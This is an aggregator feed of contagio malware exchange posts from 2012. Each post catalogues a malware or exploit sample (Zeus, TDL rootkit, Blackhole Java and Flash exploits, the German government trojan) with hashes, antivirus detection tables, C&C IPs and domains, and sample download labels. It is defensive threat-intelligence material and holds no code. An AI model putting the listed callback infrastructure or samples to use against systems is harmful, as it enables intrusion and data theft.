Quantcast
Channel: contagio malware exchange
Viewing all 79 articles
Browse latest View live

001 - Crime - Bredolab - Email link - Trojan - Feb 2012

March 3, 2012, 7:25 am
$
0
0
 MD5 EE0168C4D752DB3720E005B0929EAB7D

Download (pass infected)




Name UPS_Invoice_02142012.PDF.exe
Category crime
type trojan
vector email link

callback IP 
77.79.6.191193.106.172.227
URLs hxxp://core1.ko2-20d-bbnet1.lax.core02.net/0463/1.php
DNS querycore1.ko2-20d-bbnet1.lax.core02.ne 
Sample credit anonymous
Other links 
http://www.mcafee.com/threat-intelligence/malware/default.aspx?id=835902
http://www.threatexpert.com/report.aspx?md5=9ee2136ed046f5d0d7fce32ab9a5c36a '
Disclaimer: no analysis done on the sample, the sample name derived from AV results




Virustotal
SHA256:     cadc5e5de727049c9efbbe262f6483f404818b6ea784ea66d155a9b229bc085c
SHA1:     720f2d03eaad4e23ed22cf1886f1bb9abb0617ca
MD5:     ee0168c4d752db3720e005b0929eab7d
File size:     421.5 KB ( 431616 bytes )
File name:     720f2d03eaad4e23ed22cf1886f1bb9abb0617ca.bin
File type:     Win32 EXE
Detection ratio:     17 / 43
Analysis date:     2012-02-19 00:32:02 UTC ( 1 week, 6 days ago )
AhnLab-V3     Win-Trojan/Spyeyes.431616.B     20120215
AVG     Win32/Cryptor     20120216
BitDefender     Trojan.Generic.KDV.533579     20120216
ClamAV     BC.Heuristic.Trojan.SusPacked.BF-6.A     20120216
Comodo     UnclassifiedMalware     20120215
Emsisoft     Virus.Win32.Cryptor!IK     20120216
F-Secure     Trojan.Generic.KDV.533579     20120216
GData     Trojan.Generic.KDV.533579     20120216
Ikarus     Virus.Win32.Cryptor     20120216
Kaspersky     HEUR:Trojan.Win32.Generic     20120216
McAfee     Generic.tfr!bu     20120216
McAfee-GW-Edition     Heuristic.BehavesLike.Win32.ModifiedUPX.C     20120215
Microsoft     Trojan:Win32/EyeStye.N     20120215
NOD32     a variant of Win32/Kryptik.AAQK     20120216
nProtect     Trojan.Generic.KDV.533579     20120215
Sophos     Mal/ZboCheMan-A     20120215
TrendMicro-HouseCall     -     20120216


193.106.172.227
Host reachable, 144 ms. average
193.106.172.0 - 193.106.175.255
IQHost Ltd
Russian Federation
Maxim Sukhomlin
IQHOST Company
Dinamo 15-22
phone: +7 903 2871074
max@iqhost.ru





77.79.6.191
hst-6-191.duomenucentras.lt
Host reachable, 133 ms. average
77.79.6.0 - 77.79.7.255
Webhosting, collocation services
Lithuania
Remigijus Laurutis
Tilzes 74-320
LT-76247 Siauliai
Lithuania
phone: +37041503500
abuse@aleja.lt
Search

002 Gov - Bundestrojan - for government surveilance - Troajn - Oct 2011

March 3, 2012, 8:19 am
$
0
0
MD5  930712416770A8D5E6951F3E38548691
D6791F5AA6239D143A22B2A15F627E72

Download (pass infected)




Name  Bundestrojaner
Category crime
type trojan
vector  gov install
Sample credit anonymous
Other links  http://ccc.de/de/updates/2011/staatstrojaner





Virustotal
SHA256:     be36ce1e79ba6f97038a6f9198057abecf84b38f0ebb7aaa897fd5cf385d702f
SHA1:     e4f07b5a443cd99fd45cb5e1445ac2c1be4b455e
MD5:     930712416770a8d5e6951f3e38548691
File size:     352.0 KB ( 360448 bytes )
File name:     mfc42ul.dll
File type:     Win32 DLL
Tags:     armadillo
Detection ratio:     39 / 43
Analysis date:     2012-02-13 16:41:55 UTC ( 2 weeks, 4 days ago )
Antivirus     Result     Update
AhnLab-V3     Win-Trojan/R2d2.360448     20120213
AntiVir     TR/GruenFink.1     20120213
Antiy-AVL     Backdoor/Win32.R2D2.gen     20120213
Avast     Win32:R2D2-L [Trj]     20120213
AVG     BackDoor.Generic14.BBFR     20120213
BitDefender     Trojan.Generic.6714587     20120213
ByteHero     -     20120211
CAT-QuickHeal     Backdoor.R2d2.a     20120213
ClamAV     Trojan.BTroj-1     20120213
Commtouch     W32/R2D2.A     20120213
Comodo     Backdoor.Win32.R2D2.~B1     20120213
DrWeb     BackDoor.RTwoDTwo.1     20120213
Emsisoft     Backdoor.Win32.R2D2!IK     20120213
eSafe     Win32.Backdoor.Earlt     20120213
eTrust-Vet     Win32/R2D2.A     20120213
F-Prot     W32/R2D2.A     20120213
F-Secure     Backdoor:W32/R2D2.A     20120213
Fortinet     W32/R2D2.A!tr.bdr     20120213
GData     Trojan.Generic.6714587     20120213
Ikarus     Backdoor.Win32.R2D2     20120213
Jiangmin     Backdoor/R2D2.c     20120212
K7AntiVirus     Backdoor     20120213
Kaspersky     Backdoor.Win32.R2D2.a     20120213
McAfee     BackDoor-FCA     20120213
McAfee-GW-Edition     BackDoor-FCA     20120212
Microsoft     Backdoor:Win32/R2d2.A     20120213
NOD32     Win32/R2D2.A     20120213
Norman     W32/R2D2.A     20120213
nProtect     Backdoor/W32.R2D2.360448     20120213
Panda     Trj/Bundestrojaner.A     20120213
PCTools     Backdoor.R2D2     20120207
Sophos     Troj/BckR2D2-A     20120213
SUPERAntiSpyware     -     20120206
Symantec     Backdoor.R2D2     20120213
TheHacker     Trojan/R2D2.a     20120213
TrendMicro     BKDR_R2D2.A     20120213
TrendMicro-HouseCall     BKDR_R2D2.A     20120213
VBA32     Trojan.Polizei     20120213
VIPRE     Backdoor.Win32.R2D2.a (v)     20120213
ViRobot     Backdoor.Win32.R2D2.360448     20120213
VirusBuster     Backdoor.R2D2!w/vENfl9bd8     20120213

    * Comments
    * Additional information

No comments
This is #SPYWARE
---------------------------------
Huntsville PC Repair Computer Repair Virus Removal IT Services Huntsville Alabama
Posted 1 month ago by http://www.hsvpcrepair.com/
Component of the so-called 'Bundestrojaner' (ger. for federal trojan) of the German government.

"#Bundestrojaner" is the slang-word for a Trojan horse malware program initiated by German politicians and the german government to get access to each private PC connected to the Internet.


http://ccc.de/de/updates/2011/staatstrojaner
#malware #bundestrojaner #r2d2 #360448 #6714587
Posted 1 month, 3 weeks ago by Smartcom5
very useful spy tool
#malware #spamattachmentorlink #networkworm #drivebydownload #r2d2 #360448 #6714587
Posted 4 months, 2 weeks ago by anonymous
Bundestrojaner - 0zaptis -R2D2

Trojan Backdoor

#Bundestrojaner
#0zaptis
#R2D2
#malware #bundestrojaner #r2d2 #r2d2 #360448 #6714587
Posted 4 months, 2 weeks ago by Krypto_Graph
#malware #r2d2 #360448 #6714587
Virustotal

SHA256:     3407bf876e208f2dce3b43ccf5361c5e009ed3daf87571ba5107d10a05dc7bc4
SHA1:     7bd8d737460c1dbbfc4b250fb1b6b906ed643a2d
MD5:     d6791f5aa6239d143a22b2a15f627e72
File size:     5.3 KB ( 5376 bytes )
File name:     winsys32.sys
File type:     Win32 EXE
Detection ratio:     40 / 43
Analysis date:     2012-01-26 09:54:26 UTC ( 1 month, 1 week ago )

Antivirus     Result     Update
AhnLab-V3     Win-Trojan/R2d2.5376     20120125
AntiVir     TR/GruenFink.2     20120125
Antiy-AVL     Backdoor/Win32.R2D2.gen     20120126
Avast     Win32:R2D2-F [Trj]     20120126
AVG     BackDoor.Generic14.BBFQ     20120126
BitDefender     Backdoor.Agent.AAZH     20120126
ByteHero     -     20120125
CAT-QuickHeal     Trojan.R2d2.roo     20120125
ClamAV     Trojan.BTroj     20120126
Commtouch     W32/R2D2.A     20120126
Comodo     Backdoor.Win32.R2D2.B     20120125
DrWeb     BackDoor.RTwoDTwo.1     20120126
Emsisoft     Backdoor.Win32.R2D2!IK     20120126
eSafe     Win32.Backdoor.Earlt     20120125
eTrust-Vet     Win32/R2D2.A     20120125
F-Prot     W32/R2D2.A     20120125
F-Secure     Backdoor:W32/R2D2.A     20120126
Fortinet     W32/R2D2.A!tr.bdr     20120126
GData     Backdoor.Agent.AAZH     20120126
Ikarus     Backdoor.Win32.R2D2     20120126
Jiangmin     Backdoor/R2D2.a     20120125
K7AntiVirus     Backdoor     20120125
Kaspersky     Backdoor.Win32.R2D2.a     20120126
McAfee     BackDoor-FCA!sys     20120126
McAfee-GW-Edition     BackDoor-FCA!sys     20120126
Microsoft     Trojan:Win32/R2d2.A!rootkit     20120126
NOD32     Win32/R2D2.A     20120126
Norman     W32/R2D2.A     20120125
nProtect     Backdoor/W32.R2D2.5376     20120126
Panda     Trj/Bundestrojaner.A     20120125
PCTools     Backdoor.R2D2     20120126
Prevx     -     20120126
Rising     Trojan.Win32.Generic.12A1BF23     20120118
Sophos     Troj/BckR2D2-A     20120126
SUPERAntiSpyware     -     20120126
Symantec     Backdoor.R2D2     20120126
TheHacker     Trojan/R2D2.a     20120126
TrendMicro     RTKT_R2D2.A     20120126
TrendMicro-HouseCall     RTKT_R2D2.A     20120126
VBA32     Backdoor.R2D2.a     20120125
VIPRE     Trojan.Win32.R2D2.a!rootkit (v)     20120126
ViRobot     Backdoor.Win32.R2D2.5376     20120126
VirusBuster     Backdoor.R2D2!uglG32Y6ai0     20120126

    * Comments
    * Additional information

No comments
Component of the so-called 'Bundestrojaner' (ger. for federal trojan) of the German government.

"#Bundestrojaner" is the slang-word for a Trojan horse malware program initiated by German politicians and the german government to get access to each private PC connected to the Internet.


http://ccc.de/de/updates/2011/staatstrojaner
#malware #bundestrojaner #r2d2 #aazh #5376
Posted 1 month, 3 weeks ago by Smartcom5
Bundestrojaner driver

#Bundestrojaner
#0zaptis
#R2D2
#malware #bundestrojaner #r2d2 #r2d2 #agent #aazh
Posted 4 months, 2 weeks ago by Krypto_Graph
malware of the bundestrojana
http://www.heise.de/newsticker/meldung/CCC-knackt-Bundestrojaner-1357670.html
#malware
Posted 4 months, 3 weeks ago by anonymous
Unsigned 32bit kernel mode driver with local privilege escalation, file planting, registry modification and keylogger functionality.

Part of the german federal republic trojan / (lawful?) spying tool.
#malware #r2d2 #aazh #agent
Posted 4 months, 3 weeks ago by anonymous
Gouvernment MAlware for citizen survellience.
#earltwo #r2d2 #btroj

003 - APT-Taidoor - Attachment -Trojan - Oct 2011- RTLO

March 6, 2012, 7:55 pm
$
0
0

MD5:  E0F799CA5E8CEC5479235F5EC9E46FF7
Download (pass infected) 





Name  RTLOOct 2011
Category APT
type trojan
vector  email attachment
Sample credit Mila
Threatexpert
CC
2.229.10.5 Italy
2.116.180.66 Italy
drops a word doc as a decoy


2.229.10.5
2-229-10-5.ip194.fastwebnet.it
Host reachable, 149 ms. average
2.229.10.0 - 2.229.10.255
Infrastructure for Fastwebs main location
IP addresses for Small Business Customer 41, public subnet
Italy
ip registration service
Via Caracciolo, 51
20155 Milano MI
Italy
phone: +39 02 45451
fax: +39 02 45451
IP.RegistrationService@fastweb.it


2.116.180.66
2.116.180.64 - 2.116.180.71
UNITESSILE S.P.A.
ROBERTO DORO
UNITESSILE S P A
VIA ROMA 15
33028 TOLMEZZO
Italy
phone: +394223277
fax: +39422327852

Virustotal
 SHA256:     03b893da011374ec48929a5bfa81bf951ea66cf6effc470a616af691a708b4dd
SHA1:     7a918cb5171a9b700d7ed7484cab657962c5c7b5
MD5:     e0f799ca5e8cec5479235f5ec9e46ff7
File size:     91.9 KB ( 94129 bytes )
File name:     t.scr
File type:     Win32 EXE
Detection ratio:     36 / 43
Analysis date:     2012-03-07 03:29:38 UTC ( 0 minutes ago )

Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Sasfis     20120305
AntiVir     BDS/Simbot.94129     20120306
Antiy-AVL     Trojan/Win32.Sasfis.gen     20120305
Avast     Win32:Malware-gen     20120306
AVG     Generic25.KVX     20120306
BitDefender     Trojan.Generic.KDV.364611     20120306
ByteHero     -     20120305
CAT-QuickHeal     Trojan.Sasfis.ckjz     20120307
ClamAV     -     20120306
Commtouch     W32/Trojan-Gypikon-based.BA!Maximus     20120306
Comodo     TrojWare.Win32.Trojan.Agent.Gen     20120306
DrWeb     Trojan.Click1.63215     20120306
Emsisoft     Backdoor.Win32.Simbot!IK     20120307
eSafe     -     20120305
eTrust-Vet     Win32/Fakedoc_i     20120306
F-Prot     W32/Trojan-Gypikon-based.BA!Maximus     20120306
F-Secure     Trojan.Generic.KDV.364611     20120306
Fortinet     W32/Dropper.ZW!tr     20120305
GData     Trojan.Generic.KDV.364611     20120306
Ikarus     Backdoor.Win32.Simbot     20120307
Jiangmin     Trojan/JboxGeneric.bmq     20120301
K7AntiVirus     Trojan     20120306
Kaspersky     Trojan.Win32.Sasfis.ckjz     20120306
McAfee     Generic Dropper.zw     20120307
McAfee-GW-Edition     Generic Dropper.zw     20120307
Microsoft     Backdoor:Win32/Simbot.gen     20120307
NOD32     probably a variant of Win32/Inject.MJPLDDL     20120306
Norman     W32/Suspicious_Gen2.RRKGX     20120304
nProtect     Trojan/W32.Agent.94129     20120306
Panda     Suspicious file     20120307
PCTools     Spyware.Perfect!rem     20120228
Sophos     Mal/Behav-043     20120307
SUPERAntiSpyware     -     20120307
Symantec     Spyware.Perfect     20120305
TheHacker     Trojan/Sasfis.ckho     20120306
TrendMicro     TROJ_GEN.R3EC1JR     20120306
TrendMicro-HouseCall     TROJ_GEN.R3EC1JR     20120307
VBA32     Trojan.Genome.soas     20120306
VIPRE     Trojan.Win32.Generic!BT     20120307
VirusBuster     Backdoor.Simbot!mG3bwuKLiV4     20120307


004 - Crime - Worm Gamarue.F or Yakes - Web - Worm - Feb 2012

March 6, 2012, 8:33 pm
$
0
0
MD5: c8cc880f91c832bc7c432507f7ca56d6

Download (pass infected)





Name  worm Gamarue.F
Category Crime
type worm?
vector  Web drive by
Sample credit anonymous
File date: 2012-02-02

C&C
Domains do not resolve at the moment
business.greatespnjob.com
toptours.grantandamy.net
c388env.grasaker.se
touchme.graymalkin.us
ns1.afraid.org





strings

v'@.
XPTPSW
KERNEL32.DLL
ADVAPI32.DLL
USER32.DLL
LoadLibraryA
GetProcAddress
VirtualProtect
VirtualAlloc
VirtualFree
ExitProcess
RegCloseKey
GetMenu

Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904b0
Comments
CompanyName
Foxit Corporation
FileDescription
Foxit Reader 5.0, Best Reader for Everyday Use!
FileVersion
5, 0, 2, 0718
InternalName
Foxit Reader.exe
LegalCopyright
Copyright (C) 2009-2011 Foxit Corporation
LegalTrademarks
OriginalFilename
Foxit Reader.EXE
PrivateBuild
ProductName
Foxit Reader
ProductVersion
5, 0, 2, 0718
SpecialBuild
VarFileInfo


VirustotalDetection ratio:     33 / 43
Analysis date:     2012-03-07 04:27:15 UTC ( 0 minutes ago )
0
0
Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Jorik     20120307
AntiVir     Worm/Gamarue.F.6     20120306
Antiy-AVL     Trojan/Win32.Yakes.gen     20120305
Avast     Win32:Rootkit-gen [Rtk]     20120306
AVG     Generic26.CNIK     20120306
BitDefender     Trojan.Generic.KDV.524519     20120307
ByteHero     -     20120305
CAT-QuickHeal     Trojan.Yakes.oqs     20120307
ClamAV     -     20120306
Commtouch     -     20120307
Comodo     TrojWare.Win32.Trojan.Agent.Gen     20120306
DrWeb     Trojan.DownLoader5.42407     20120307
Emsisoft     Trojan.Win32.Yakes!IK     20120307
eSafe     -     20120305
eTrust-Vet     -     20120306
F-Prot     -     20120306
F-Secure     Trojan.Generic.KDV.524519     20120306
Fortinet     W32/Yakes.OQS!tr     20120305
GData     Trojan.Generic.KDV.524519     20120306
Ikarus     Trojan.Win32.Yakes     20120307
Jiangmin     Trojan/Generic.wzzm     20120301
K7AntiVirus     Trojan     20120306
Kaspersky     Trojan.Win32.Yakes.oqs     20120306
McAfee     Generic.tfr!br     20120307
McAfee-GW-Edition     Generic.tfr!br     20120307
Microsoft     Worm:Win32/Gamarue.F     20120307
NOD32     a variant of Win32/Kryptik.ZXP     20120306
Norman     W32/Suspicious_Gen4.IAZE     20120304
nProtect     Trojan.Generic.KDV.524519     20120306
Panda     Generic Trojan     20120307
PCTools     -     20120228
Prevx     -     20120307
Rising     -     20120306
Sophos     Troj/Bredo-QG     20120307
SUPERAntiSpyware     Heur.Agent/Gen-FakeFoxit     20120307
Symantec     Trojan.Gen     20120305
TheHacker     Posible_Worm32     20120306
TrendMicro     TROJ_GEN.R3EC7B4     20120306
TrendMicro-HouseCall     TROJ_GEN.R3EC7B4     20120307
VBA32     Trojan.Yakes.oqs     20120306
VIPRE     Trojan.Win32.Generic!BT     20120307
ViRobot     -     20120307
VirusBuster     Trojan.Yakes!krnc77DoB8w     20120307

005 Crime - Blackhole Java CVE-2010-0840 - exploit - Web - Feb 2012

March 6, 2012, 8:58 pm
$
0
0
MD5:  1d26215f49beeefad8392e3e4e192e90
 
 Download (pass infected)


Name  Java CVE-2010-0840
Category Crime
type exploit
vector  Web
Sample credit Mila


Virustotal
SHA256:     ee1fc2ec13e067824dbc950064115b6d08705955c3f7251f360183faca5193da
SHA1:     ccded41a7eae60999686b668fd4e4e8bd50b7aa5
MD5:     1d26215f49beeefad8392e3e4e192e90
File size:     5.2 KB ( 5361 bytes )
File name:     czhwjvgwkmarcoj.jar
File type:     ZIP
Detection ratio:     18 / 43
Analysis date:     2012-03-07 04:47:01 UTC ( 0 minutes ago )

Antivirus     Result     Update
AhnLab-V3     -     20120307
AntiVir     EXP/CVE-2010-0840     20120306
Antiy-AVL     Exploit/Java.Agent     20120305
Avast     Java:Agent-ACJ [Expl]     20120306
AVG     Java/Agent     20120306
BitDefender     Java.Exploit.CVE-2010-0840.Y     20120307
Comodo     UnclassifiedMalware     20120306
DrWeb     Java.Downloader.510     20120307
Emsisoft     Exploit.Java.Agent!IK     20120307
eTrust-Vet     -     20120306
F-Secure     Java.Exploit.CVE-2010-0840.Y     20120306
Fortinet     -     20120305
GData     Java.Exploit.CVE-2010-0840.Y     20120306
Ikarus     Exploit.Java.Agent     20120307
Jiangmin     Exploit.Java.ic     20120301
K7AntiVirus     -     20120306
Kaspersky     Exploit.Java.Agent.fw     20120306
McAfee     Downloader.a!bb3     20120307
McAfee-GW-Edition     Downloader.a!bb3     20120307
Microsoft     -     20120307
nProtect     Java.Exploit.CVE-2010-0840.Y     20120306
SUPERAntiSpyware     -     20120307
Symantec     Trojan.Maljava     20120305
TrendMicro-HouseCall     -     20120307

006 Crime - Blackhole CVE-2011-3544 - exploit - Web - Feb 2012

March 6, 2012, 9:12 pm
$
0
0
MD5:  85b0f524facca1b00f66e4a7ecb317e4

Download (pass infected)




Name  JavaCVE-2011-3544
Category Crime
type exploit
vector  Web
Sample credit Mila


VirustotalSHA256:     c13839854d0d950319ca97538f1cce6e050c5596d21251bb6e925647bf3e13d6
SHA1:     81a274046b2f3fc90c967a6ba26add941cd8ba41
MD5:     85b0f524facca1b00f66e4a7ecb317e4
File size:     4.7 KB ( 4840 bytes )
File name:     /30/xuaqxoewjlcsgsa.jar
File type:     ZIP
Detection ratio:     24 / 43
Analysis date:     2012-02-18 13:47:03 UTC ( 2 weeks, 3 days ago )

Antivirus     Result     Update
AhnLab-V3     -     20120216
AntiVir     EXP/CVE-2011-3544.U     20120217
Antiy-AVL     Exploit/Java.CVE-2011-3544     20120213
Avast     Java:CVE-2011-3544-M [Expl]     20120218
AVG     -     20120218
BitDefender     Trojan.Agent.ATMO     20120218
ByteHero     -     20120216
CAT-QuickHeal     -     20120218
ClamAV     -     20120218
Commtouch     -     20120218
Comodo     UnclassifiedMalware     20120217
DrWeb     Exploit.CVE2011-3544.4     20120218
Emsisoft     Trojan-Dropper.Agent!IK     20120218
eSafe     -     20120216
eTrust-Vet     -     20120217
F-Prot     -     20120218
F-Secure     Trojan.Agent.ATMO     20120218
Fortinet     Java/CVE_2011_3544.L!exploit     20120218
GData     Trojan.Agent.ATMO     20120218
Ikarus     Trojan-Dropper.Agent     20120218
Jiangmin     Exploit.Java.gv     20120217
K7AntiVirus     -     20120217
Kaspersky     Exploit.Java.CVE-2011-3544.l     20120218
McAfee     Downloader.a!b2d     20120218
McAfee-GW-Edition     Downloader.a!b2d     20120217
Microsoft     TrojanDownloader:Java/Comesis.A     20120218
NOD32     Java/Exploit.CVE-2011-3544.H     20120218
Norman     JAVA/Exploit.CVE-2011-3544.A     20120218
nProtect     Trojan.Agent.ATMO     20120218
Panda     -     20120218
PCTools     -     20120217
Prevx     -     20120218
Rising     -     20120217
Sophos     Troj/Java-BD     20120218
SUPERAntiSpyware     -     20120206
Symantec     Trojan.Gen.2     20120218
TheHacker     -     20120218
TrendMicro     JAVA_EXPLOYT.KAT     20120218
TrendMicro-HouseCall     JAVA_EXPLOYT.KAT     20120218
VBA32     Exploit.Java.CVE-2011-3544.l     20120217
ViRobot     -     20120307
VirusBuster     -

007 - Crime - Blackhole Flash CVE-2011-0611 SWF - Exploit - Web - Feb 2012

March 6, 2012, 9:23 pm
$
0
0

MD5:  196D309B7366F7507586CD162C8ED2C9

Download (pass infected) 



 Name  Blackhole Flash CVE-2011-0611_SWF
Category Crime
type exploit
vector  Web
Sample credit Mila
Date Feb 2012



ActionScript



VirustotalSHA256:     1581dc1e2cac90116a7f91bb8e68d44a7f4513369309c691f71f2d022d85e63a
SHA1:     5eae153d5ad6c0967b88bfc9efb7c535dca25ff1
MD5:     196d309b7366f7507586cd162c8ed2c9
File size:     7.0 KB ( 7124 bytes )
File name:     11519464962-9-4_1.x-shockwave-flash
File type:     Flash
Detection ratio:     10 / 43
Analysis date:     2012-03-06 13:23:20 UTC ( 15 hours, 56 minutes ago )
Antivirus     Result     Update
AhnLab-V3     -     20120305
AntiVir     EXP/CVE-2011-0611.FL     20120306
Antiy-AVL     -     20120305
Avast     SWF:Downloader-AK [Expl]     20120306
BitDefender     Script.SWF.Cxx     20120306
F-Secure     Script.SWF.Cxx     20120306
Fortinet     SWF/CVE20110611.fam!exploit     20120305
GData     Script.SWF.Cxx     20120306
Kaspersky     Exploit.SWF.CVE-2011-0611.be     20120305
McAfee-GW-Edition     -     20120304
Norman     HTML/Shellcode.AA     20120304
nProtect     Script.SWF.Cxx     20120306
Sophos     Troj/SWFExp-AI     20120306

008 - Crime - Blackhole payload FakeAV - trojan - Web - Feb 2012

March 11, 2012, 10:29 am
$
0
0
MD5:  4135cbcf65163b39ea4ed00da7114cbe

Download (pass infected) 




Name  Blackhole delivered FakeAV
Category Crime
type trojan  dropper
vector  Web
Sample credit Mila
Date Feb 2012

https://www.virustotal.com/file/d2444eb298bcbcecc31c548b6f2554424304672e727fbf7497b3cc3df2e36e24/analysis/
 SHA256:     d2444eb298bcbcecc31c548b6f2554424304672e727fbf7497b3cc3df2e36e24
SHA1:     329c53e760aa26d6242fe61f0dd6bca7d3ba367d
MD5:     4135cbcf65163b39ea4ed00da7114cbe
File size:     801.0 KB ( 820224 bytes )
File name:     4135cbcf65163b39ea4ed00da7114cbe
File type:     Win32 EXE
Detection ratio:     23 / 43
Analysis date:     2011-12-10 15:30:24 UTC ( 3 months ago )
Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Jorik     20111209
AntiVir     TR/Crypt.XPACK.Gen3     20111209
Antiy-AVL     Trojan/win32.agent.gen     20111210
Avast     Win32:FakeAlert-BPF [Trj]     20111209
AVG     Generic26.SLF     20111210
BitDefender     Gen:Variant.Kazy.47732     20111210
Comodo     UnclassifiedMalware     20111210
DrWeb     Trojan.Fakealert.26233     20111210
Emsisoft     Win32.SuspectCrc!IK     20111210
eTrust-Vet     -     20111209
F-Secure     Gen:Variant.Kazy.47732     20111210
Fortinet     W32/FakeAlert_Rena.BG!tr     20111210
GData     Gen:Variant.Kazy.47732     20111210
Ikarus     Win32.SuspectCrc     20111210
Kaspersky     HEUR:Trojan.Win32.Generic     20111210
McAfee     FakeAlert-Rena.bg     20111210
McAfee-GW-Edition     FakeAlert-Rena.bg     20111210
Norman     W32/Suspicious_Gen2.TVZEA     20111210
Panda     Trj/CI.A     20111210
Sophos     Mal/FakeAV-LX     20111210
SUPERAntiSpyware     -     20111210
TrendMicro     TROJ_GEN.R72C7L8     20111210
TrendMicro-HouseCall     TROJ_GEN.R72C7L8     20111210
Search

009 - Crime - DNSChanger - TDL/Alureon rootkit variant - Rootkit - Web - June 2010

March 11, 2012, 10:36 am
$
0
0
MD5:   0d7b87223d6fd2ab7236e56838c5563b

Download (pass infected) 






Name DNSChanger TDL rootkit variant
Category Crime
type rootkit trojan 
vector  Web
Sample credit anonymous
Date June 2010

https://www.virustotal.com/file/d7623db7e16c1d5b9d20a263576afc289e7f974cc9cf15f2032f441b8f87c73c/analysis/1331487072/

SHA256:     d7623db7e16c1d5b9d20a263576afc289e7f974cc9cf15f2032f441b8f87c73c
SHA1:     1bc027cf28a63846ab46ea06d9c27133b5c09578
MD5:     0d7b87223d6fd2ab7236e56838c5563b
File size:     182.0 KB ( 186368 bytes )
File name:     DNSChanger_0d7b87223d6fd2ab7236e56838c5563b.exe
File type:     Win32 EXE
Detection ratio:     38 / 43
Analysis date:     2012-03-11 17:31:12 UTC ( 0 minutes ago )

Antivirus     Result     Update
AhnLab-V3     Win-Trojan/TDSS4.Gen     20120310
AntiVir     TR/Crypt.XPACK.Gen     20120311
Antiy-AVL     Trojan/win32.agent.gen     20120311
Avast     Win32:Trojan-gen     20120311
AVG     Downloader.Agent2.SAW     20120311
BitDefender     Trojan.Generic.4103909     20120311
ByteHero     -     20120309
CAT-QuickHeal     -     20120311
ClamAV     Trojan.Dropper-25529     20120311
Commtouch     W32/Alureon.J.gen!Eldorado     20120311
Comodo     TrojWare.Win32.Olmarik.AME     20120311
DrWeb     BackDoor.Tdss.2215     20120311
Emsisoft     Trojan-Dropper.Win32.TDSS!IK     20120311
eSafe     Win32.VirToolObfusca     20120308
eTrust-Vet     Win32/Alureon.ATL     20120310
F-Prot     W32/Alureon.J.gen!Eldorado     20120311
F-Secure     Trojan.Generic.4103909     20120311
Fortinet     -     20120311
GData     Trojan.Generic.4103909     20120311
Ikarus     Trojan-Dropper.Win32.TDSS     20120311
Jiangmin     TrojanDownloader.Agent.cefc     20120301
K7AntiVirus     Trojan     20120310
Kaspersky     Packed.Win32.Krap.io     20120311
McAfee     FakeAlert-MI     20120307
McAfee-GW-Edition     FakeAlert-MI     20120311
Microsoft     Trojan:Win32/Alureon.CO     20120311
NOD32     Win32/Olmarik.TN     20120311
Norman     W32/Tdss.C!genr     20120311
nProtect     Trojan-Downloader/W32.Agent.186368.AO     20120310
Panda     Suspicious file     20120311
PCTools     Trojan.Generic     20120311
Prevx     -     20120311
Rising     Trojan.Win32.Generic.128B788C     20120309
Sophos     Troj/Virtum-Gen     20120311
SUPERAntiSpyware     Rootkit.Agent/Gen-Trexer     20120308
Symantec     Trojan Horse     20120311
TheHacker     Trojan/Downloader.Agent.dcny     20120309
TrendMicro     TROJ_COSMU.SM     20120311
TrendMicro-HouseCall     TROJ_COSMU.SM     20120311
VBA32     Trojan.Olmarik.tn     20120311
VIPRE     Trojan.Win32.Obfusc.o.gen (v)     20120311
ViRobot     -     20120311
VirusBuster     Trojan.DL.Agent!JRDQILTdMj4     20120311

010 - Crime - GameOver Zeus (with P2P and DGA) -trojan- - Web - Feb 2012

March 11, 2012, 10:47 am
$
0
0
MD5:    29bd4104db1417d8323d124ab355e232

Download (pass infected)





Name Gameover Zeus variant (with P2P and DGA)
Category Crime
type trojan 
vector  Web
Sample credit anonymous
Date Feb 2012


https://www.virustotal.com/file/701b1a1a8f6b59c2ec79776d332a3149f9d5e2ae449214a13a5f76c371fec522/analysis/1331487539/

SHA256:     701b1a1a8f6b59c2ec79776d332a3149f9d5e2ae449214a13a5f76c371fec522
SHA1:     6027557ace4158d21b771503ed3d84f8911134a8
MD5:     29bd4104db1417d8323d124ab355e232
File size:     321.5 KB ( 329192 bytes )
File name:     melt.exe
File type:     Win32 EXE
Detection ratio:     36 / 43
Analysis date:     2012-03-11 17:38:59 UTC ( 0 minutes ago )

Antivirus     Result     Update
AhnLab-V3     Spyware/Win32.Zbot     20120310
AntiVir     TR/PSW.Zbot.142     20120311
Antiy-AVL     Trojan/Win32.Zbot.gen     20120311
Avast     Win32:Crypt-LKD [Trj]     20120311
AVG     PSW.Generic9.BJJL     20120311
BitDefender     Gen:Variant.Kazy.54668     20120311
ByteHero     -     20120309
CAT-QuickHeal     TrojanPWS.Zbot.Y     20120311
ClamAV     Trojan.Spy.Zbot-568     20120311
Commtouch     W32/Zbot.DQ.gen!Eldorado     20120311
Comodo     TrojWare.Win32.Spy.ZBot.DIWT     20120311
DrWeb     Trojan.PWS.Panda.1698     20120311
Emsisoft     Trojan-Spy.Win32.Zbot!IK     20120311
eSafe     -     20120308
eTrust-Vet     Win32/Zbot.AA!generic     20120310
F-Prot     W32/Zbot.DQ.gen!Eldorado     20120311
F-Secure     Gen:Variant.Kazy.54668     20120311
Fortinet     W32/Zbot.DIVN!tr     20120311
GData     Gen:Variant.Kazy.54668     20120311
Ikarus     Trojan-Spy.Win32.Zbot     20120311
Jiangmin     TrojanDropper.Injector.lbl     20120301
K7AntiVirus     Spyware     20120310
Kaspersky     Trojan-Spy.Win32.Zbot.divn     20120311
McAfee     PWS-Zbot.gen.re     20120308
McAfee-GW-Edition     PWS-Zbot.gen.re     20120311
Microsoft     PWS:Win32/Zbot.gen!AF     20120311
NOD32     Win32/Spy.Zbot.AAN     20120311
Norman     W32/Agent.XEHW     20120310
nProtect     Trojan-Spy/W32.ZBot.329192     20120311
Panda     Generic Trojan     20120311
PCTools     -     20120311
Prevx     -     20120311
Rising     -     20120309
Sophos     Troj/Zbot-BJZ     20120311
SUPERAntiSpyware     -     20120308
Symantec     Trojan.Zbot!gen30     20120311
TheHacker     Trojan/Spy.Zbot.dixa     20120309
TrendMicro     TSPY_ZBOT.SMKS     20120311
TrendMicro-HouseCall     TSPY_ZBOT.SMKS     20120311
VBA32     TrojanSpy.Zbot.diwt     20120311
VIPRE     Trojan.Win32.Zbot.bjz (v)     20120311
ViRobot     -     20120311
VirusBuster     TrojanSpy.Zbot!9voVWKfmClE     20120311

No comments
